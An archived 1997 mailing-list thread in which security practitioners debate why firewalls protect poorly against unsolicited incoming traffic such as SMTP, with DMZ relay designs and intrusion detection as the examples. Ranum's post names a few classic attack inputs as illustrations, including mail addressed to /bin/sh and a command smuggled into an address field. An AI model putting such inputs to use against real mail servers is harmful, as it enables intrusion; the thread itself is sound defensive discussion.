Firewall Wizards mailing list archives

RE: firewalls and the incoming traffic problem


From: Dominique Brezinski <dominique.brezinski () cybersafe com>
Date: Tue, 30 Sep 1997 12:15:29 -0700

Hello all,
        I just joined this list, so I have read today's messages in this thread
only. There are a few messages with content I would like to comment on, but
I will start here since there is a copy of MJR's post at the bottom.

        I tend to be interested in IDS and incident forensics, but I have had to
think about firewall topologies and technologies for practical reasons in
the past. I agree with MJR about unsolicited services being a big issue -
an issue so large that I believe all current perimeter security
technologies I know of are insufficient protection. I will use the SMTP
example and the topology Dana Nowell describes as an example.

        The problem with using relay hosts in the DMZ for unsolicited services is
that they are, by definition, a nexus between the trusted network inside
and the untrusted public network. The relay host MUST be able to
communicate with its internal peer, either directly at the network layer
(through some sort of filter) or through an application proxy, due to the
fact that these are unsolicited services pushing information into the
trusted network. With SMTP setup in this kind of configuration, one will
generally have a DMZ mailhub, a filter or proxy, and then the internal
mailhub. As MJR noted, the DMZ mailhub will have to accept SMTP from just
about everywhere, but the proxy/filter and internal mailhub can be limited
to a finite scope. The problem that occurs is that SMTP is attacked through
data driven exploits (think MIME conversions in Sendmail 8.8.X), and
therefore it is usually easy to propagate the exploit through this chain.
To compound issues, most sites use the same SMTP handler on the DMZ mailhub
as they do in the internal mailhub, and thus the same attack that works on
the DMZ hub works on the internal hub. By transitive properties we can
assume that since the world can communicate with the DMZ hub and the DMZ
hub can communicate with the internal hub, that the world can actually
communicate with the internal hub. The fact that it is two hops instead of
one really does not make too much difference against a dedicated attacker,
though it might thwart a script kiddie. We now must rely on the
configuration and security of the SMTP handler(s) and host(s) on the
inside, which is the point I believe MJR is making.

        I have seen this technique used with NNTP in the not too distant past, and
it is generally the way firewalls are penetrated. I personally have started
looking back to other methods for trying to provide better security. Like
MJR, I don't believe firewalls are dead, I just view them as one piece of
perimeter defense.

        Several people mentioned AI and IDS techniques coming into play, which I
believe they will, but in a different manner than they have historically.
Most, if not all, IDS systems attempt to specifically isolate and recognize
specific exploits through expert analysis, pattern matching, and other AI
techniques. This leads to several problems: as the set of vulnerabilities
and exploits grow, the work time increases; the set of known exploits will
always be smaller than the set of currently used exploits; this method does
not work for data attacks in custom applications well; and the ability to
respond to the attack is often limited. For ID techniques to work well in a
living breathing network, I believe we will see intrusion detection spread
out through the network, with the firewall being one of the many points of
input. Just as the firewall policy should be that which is not specifically
accepted is denied, IDS should learn by that model.

        More later...

Dominique Brezinski

At 11:58 AM 9/29/97 -0400, Dana Nowell wrote:
OK, maybe I missed something but ...

If I build a entryway that has a DMZ and I populate the DMZ with service
handlers that accept and fullfil the external requests don't I mitigate the
problem?

For example, I put a mail gateway in the DMZ.  All internal mail is sent to
the internal mail hub who knows about all the internal users and forwards
all external mail out to the external mail gateway.  The external gateway
takes all mail it receives and delivers it (assume Anti-SPAM propagation
filters).  External mail from the internal mail hub is sent over the
Internet, Internet mail is resolved via aliases on the mail gateway to be
forwarded to the internal mail hub (if necessary).  I can handle all
addressing trouble in the external mail gateway (proxy) as no mail passes
internally unless an alias is present in the aliases file (this discussion
assumes sendmail as it seems to be the common denominator, any mailer
supporting an alias mechanism can be used). The obvious problem is
maintaining the aliases file and the current patch level of the gateway.  A
possible bottleneck issue exsits and can be solved via multiple gates in
parallel.

The same paradigm exsits for www servers, say an external server that is
refreshed periodically from an internal server via FTP.  Same for ftp
servers,  and most other services.  Main issues is setting up the internal
to external mirroring.  Now all 'unsolicited' services supported at the
corporate/division/non-individual level are handled in the DMZ on
sacrificial hosts mirroring data internal hosts. A breach nets you access
to an untrusted  host in the DMZ, the same access you had before from the
attacking host (discounting use as a jump point to attack other nets).

Now for solicited access you have one or more firewalls bridging the
internal net to the DMZ (use a different firewall to handle the mirror
traffic and point all hosts in the DMZ to that more specific firewall for
any internal traffic).

Now, unsolicited traffic always terminates in the DMZ at a sacrificial
host, you break it you get squat.  Possible exception is the email host
which should only accept mail destined to external addresses or to a known
alias, minimizing exposure.  If the email host is compromised, it ONLY has
access to the internal hub on port 25 (enforced via firewall proxy/filter).
This implies a two phase breakin is required, the sacrificial mail host and
then attack the internal hub, hopefully the admin will notice :).

Add more unsolicited services, add more sacrificial hosts in the DMZ.
Issue arises if you need access to internal data in realtime, never a good
idea but sometimes required by management.  If yesterday's data is OK,
replicate to the DMZ host.

So unless realtime access is needed, why is this increase in external
services a problem (other that admin and automated tool building)?

So Marcus, what did I miss??




On Sun, 28 Sep 1997 11:32:19 +0000 Marcus J. Ranum expounded:

I'm concerned that firewall technologies are going to
reach an impasse in the next couple of years over what
I am calling the "incoming traffic problem."  Briefly, the
problem:
     - Firewalls are good at providing access control
     on return traffic that is in response to a request
     that originated behind the firewall
     - Firewalls are poor at providing access control
     on "unsolicited" incoming traffic to generic
     services that are "required" as part of being on
     the Internet
     - The number of generic services is increasing
     slowly
     - The number of implementations of the generic
     services is increasing dramatically

Let's take Email as the perfect example. If I have a mail
server behind a firewall, and I want to receive Email,
I have to allow it in to my mail server somehow. More
importantly, for Email to work the way we want it to, I
have to allow Email from virtually any site in to that
mail server. Therefore, the firewall's protection is reduced
as regards my Email service. (I'll come back to the proxy
nonproxy issue later) So, we're back to worrying about
sendmail - or are we? Nowadays there are zillions of
implementations of SMTP, on many different O/S platforms,
and it's likely that there are security holes (of one sort or
another) in many of them.

The proxy/nonproxy discussion is becoming increasingly
irrelevant, as a result. Let's assume I'm using some kind
of turbo-whomping stateful filter -- in that case I need to
worry A Whole Lot about the implementation of my Email
service. If I'm allowing the whole world to reach port
25 on my mail server, then the whole world can probe
it for bugs, and, if I'm running a buggy mailer, I have a
real problem. If I'm using a proxy firewall, the proxy
may perform some additional checks, and may block
some well-known attacks, but the problem is still there.
What if I have a proxy firewall built by a UNIX guru,
which knows about mail to: /bin/sh, but which doesn't
know about mail to: c:\autoexec.bat? Those are the
easy cases -- what about the bug in bubbmail1.2 for
Windows NT, where if you send mail addressed to
to: <admincommand: reboot> it will reboot the
machine? A little feature that crept in there...

Summary: firewalls originally offered the promise that
you could "install a firewall and not worry about your
internal security."  Now, it's clear that firewalls force
you to split your security between the firewall and host
security on all the systems to which the firewall permits
incoming  traffic.

If I'm going to have to worry about the host security
and the server side s/w on my internal systems, why
shouldn't I just use a router with gross-level filtering
to channel traffic into a few carefully configured
backend servers? The "hard part" is doing the backend
configuration anyhow!!

What's worrying me is all the folks I've seen who put
a firewall in, and believe it is going to somehow protect
the incoming traffic. :( I had a consulting gig where
the customer had a very high profile target website
behind a bunch of proxy firewalls - and for performance
the firewalls were just using plugboard proxies to copy
the data back and forth. AND the web server was a
version of NCSA with known holes. Even if they had had
a proxy server, the proxy server, if it was provided by a
vendor, would not have been able to "know" about
security holes in their locally-developed CGI scripts.
It keeps coming back to having carefully configured
backend servers -- which is expensive and requires
constant maintenance.

I'm not saying that "firewalls are dead" because this
problem has always been there and firewalls DO serve
a purpose. The fact is that sites with firewalls get broken
into less often that sites without. But - are a majority
of firewall users falsely confident?



Current thread: